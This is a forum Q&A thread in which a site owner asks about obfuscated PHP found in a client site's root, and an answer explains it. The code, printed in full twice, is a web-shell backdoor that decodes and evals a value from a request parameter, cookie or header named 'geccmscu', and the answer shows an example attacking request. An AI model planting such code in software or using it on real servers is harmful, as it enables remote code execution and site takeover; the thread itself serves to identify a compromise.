What is this PHP code doing? Looks like a hack
I found this code in the root of the client site. I decoded it as follows:
$brownies = create_function( ' ', eval(array_pop(func_get_args())); );
$brownies('L','9','$','>','','K','H','B','m', $i=array_merge($_REQUEST,$_COOKIE,$_SERVER); $a=isset($i["geccmscu"]) ? $i["geccmscu"] : (isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die ); eval(strrev(base64_decode(strrev($a)))););
It looks like it gets the code from the cookie or user and evaluates it, but I can't tell further from there.
Does anyone have any understanding of this?
source to share
Here's some indented code:
$brownies = create_function( ' ', eval(array_pop(func_get_args())); );
$brownies('L','9','$','>','','K','H','B','m',
$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["geccmscu"]) ? $i["geccmscu"] :
(isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die );
eval(strrev(base64_decode(strrev($a)))););
First it checks if the $i
key "geccmscu" is among the cookies, requests and server values (variable ). If not, it checks if a header with the same name ("HTTP_GECCMSCU") is defined. If not, the script stops.
If this "geccmscu" variable has been defined somewhere, it is stored in $a
. The script then decodes it (content is "encrypted" with strrev and base64) and executes it througheval()
Basically, someone could attack your server with an HTTP request, for example:
GET http://example.com?geccmscu=someevilphpcode
Then "someevilphpcode" will be decoded and executed on your server.
source to share